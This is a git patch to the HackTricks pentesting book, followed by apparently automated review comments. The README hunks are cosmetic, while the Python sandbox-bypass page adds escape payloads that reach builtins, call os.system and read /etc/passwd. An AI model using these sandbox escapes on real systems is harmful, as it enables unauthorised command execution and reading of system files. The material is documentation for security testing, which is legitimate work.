From 8625431ec68fd890c9c5b3071a72c221016c565f Mon Sep 17 00:00:00 2001 From: CPol Date: Mon, 4 Oct 2021 11:09:20 +0000 Subject: [PATCH] GitBook: [master] 517 pages modified --- README.md | 18 +++++++++--------- misc/basic-python/bypass-python-sandboxes.md | 16 ++++++++++++++-- 2 files changed, 23 insertions(+), 11 deletions(-) diff --git a/README.md b/README.md index 37053d553..e2665938f 100644 --- a/README.md +++ b/README.md 
@@ -20,8 +20,8 @@ Here you will find the **typical flow** that **you should follow when pentesting **Click in the title to start!** -If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/) **\*\*\[**PEASS & HackTricks telegram group here**\]\(**[https://t.me/peass](https://t.me/peass)**\), or** follow me on Twitter ****[**🐦**](https://emojipedia.org/bird/)**\[**@carlospolopm**\]\(**[https://twitter.com/carlospolopm](https://twitter.com/carlospolopm)**\)**. -**If you want to** share some tricks with the community **you can also submit** pull requests **to \[**[https://github.com/carlospolop/hacktricks\*\*\]\(https://github.com/carlospolop/hacktricks](https://github.com/carlospolop/hacktricks**]%28https://github.com/carlospolop/hacktricks)\) **that will be reflected in this book. +If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/) [**PEASS & HackTricks telegram group here**](https://t.me/peass)**, or** follow me on Twitter ****[**🐦**](https://emojipedia.org/bird/)\*\*\*\*[**@carlospolopm**](https://twitter.com/carlospolopm). +**If you want to** share some tricks with the community **you can also submit** pull requests **to** [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks**]%28https://github.com/carlospolop/hacktricks) **that will be reflected in this book. Don't forget to** give ⭐ on the github\*\* to motivate me to continue developing this book. {% hint style="danger" %} 
@@ -32,17 +32,15 @@ Do you use **Hacktricks every day**? Did you find the book **very** **useful**? If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks** or **PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book. +[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop) + ## Corporate Sponsors -### \*\*\*\*[**INE**](https://ine.com/)\*\*\*\* +### [**INE**](https://ine.com/) ![](.gitbook/assets/ine_logo-3-.jpg) -[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop) - -\*\*\*\*[**INE**](https://ine.com/) is a great platform to start learning or **improve** your **IT knowledge** through their huge range of **courses**. I personally like and have completed many from the [**cybersecurity section**](https://ine.com/pages/cybersecurity). **INE** also provides with the official courses to prepare the **certifications** from [**eLearnSecurity**](https://elearnsecurity.com/)**.** - -Copyright © Carlos Polop 2020. Except where otherwise specified, the text on [HACK TRICKS](https://github.com/carlospolop/hacktricks) by Carlos Polop is licensed under the [**Commons Clause**](https://commonsclause.com/) \(which allow you to use this content freely WITHOUT commercial use\). 
+[**INE**](https://ine.com/) is a great platform to start learning or **improve** your **IT knowledge** through their huge range of **courses**. I personally like and have completed many from the [**cybersecurity section**](https://ine.com/pages/cybersecurity). **INE** also provides with the official courses to prepare the **certifications** from [**eLearnSecurity**](https://elearnsecurity.com/)**.** #### **Courses and Certifications reviews** @@ -50,7 +48,9 @@ You can find **my reviews of the certifications eMAPT and eWPTXv2** \(and their {% page-ref page="courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md" %} -\*\*\*\* + + +Copyright © Carlos Polop 2020. Except where otherwise specified, the text on [HACK TRICKS](https://github.com/carlospolop/hacktricks) by Carlos Polop is licensed under the [**Commons Clause**](https://commonsclause.com/) \(which allow you to use this content freely WITHOUT commercial use\). **Copyright © Carlos Polop 2021. Except where otherwise specified, the rights of the text on** [**HACKTRICKS**](https://github.com/carlospolop/hacktricks) **by Carlos Polop are reserved.** diff --git a/misc/basic-python/bypass-python-sandboxes.md b/misc/basic-python/bypass-python-sandboxes.md index 7b42d34de..310bc624b 100644 --- a/misc/basic-python/bypass-python-sandboxes.md +++ b/misc/basic-python/bypass-python-sandboxes.md 
@@ -206,9 +206,13 @@ get_flag.__globals__['__builtins__']['__import__']("os").system("ls") #### Python3 ```python -# Obtain the builtins from a defined function -get_flag.__globals__['__builtins__'].__import__("os").system("ls") +# Obtain builtins from a globally defined function +print.__self__ +dir.__self__ +globals.__self__ +# Obtain the builtins from a defined function +get_flag.__globals__['__builtins__'] # The os._wrap_close class is usually loaded. Its scope gives direct access to os package (as well as __builtins__) [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'os." in str(x) ][0]['system']('ls') @@ -227,6 +231,14 @@ __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ __builtins__["__import__"]('os').system('ls') ``` +### Builtins payloads + +```python +# Possible payloads once you have found the builtins +.open("/etc/passwd").read() +.__import__("os").system("ls") +``` + ### Discovering loaded variables Checking the **`globals`** and **`locals`** is a good way to know what you can access.
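Review bot: In the README.md hunk at `@@ -20,8 +20,8`, the rewritten pull-request link still carries a corrupted target, `(https://github.com/carlospolop/hacktricks**]%28https://github.com/carlospolop/hacktricks)`, which should be just `https://github.com/carlospolop/hacktricks`. The added lines also keep stray emphasis markers: `****` before the bird emoji link, `\*\*\*\*` after it, and an unclosed `**` in front of "that will be reflected in this book." These will render as literal asterisks, so they should be removed in the same change that cleans up the Telegram and Twitter links.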
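Review bot: In the README.md hunk at `@@ -32,17 +32,15`, the unchanged context paragraph still points the bird emoji at a hacktricks `tree/` URL ending in `/[https:/emojipedia.org/bird/README.md`, while the first hunk uses `https://emojipedia.org/bird/` for the same icon. Since this patch is a markup cleanup, that link should be fixed here too. The re-added INE sentence also keeps "also provides with the official courses"; suggest "also provides the official courses".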
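Review bot: In the README.md hunk at `@@ -50,7 +48,9`, the moved "Copyright © Carlos Polop 2020" line now sits directly above the existing "Copyright © Carlos Polop 2021" line, and the two state different terms: the first licenses the text under the Commons Clause for free non-commercial use, the second says the rights are reserved. Keep one statement, or say explicitly which content each applies to. The hunk also adds two empty lines before the copyright text where one is enough, and "which allow you" should read "which allows you".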
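Review bot: In the bypass-python-sandboxes.md hunk at `@@ -206,9 +206,13`, the new comment "Obtain builtins from a globally defined function" does not match the lines under it: `print`, `dir` and `globals` are built-in functions, not functions defined by the target code, and the comment is nearly identical to the next one, "Obtain the builtins from a defined function". Suggest rewording the first to something like "Obtain the builtins module from any built-in function (`__self__`)" so the two cases are distinguishable. Note also that the `__self__` lines yield the builtins module, while `get_flag.__globals__['__builtins__']` can be either the module or its dict depending on where `get_flag` was defined; the Python2 line in the hunk header subscripts it and the removed Python3 line used attribute access, so the text should say which form is expected.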
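Review bot: In the bypass-python-sandboxes.md hunk at `@@ -227,6 +231,14`, the two lines in the new "Builtins payloads" block start with a bare `.`, so the fenced `python` block is not valid Python and the reader is never told what the fragments attach to. Add a sentence or comment saying they are suffixes to the builtins object obtained in the previous section. The fragments also assume attribute access, while the context line just above uses `__builtins__["__import__"]`; the section should state that the attribute form applies when the object is the module and the subscript form when it is the dict.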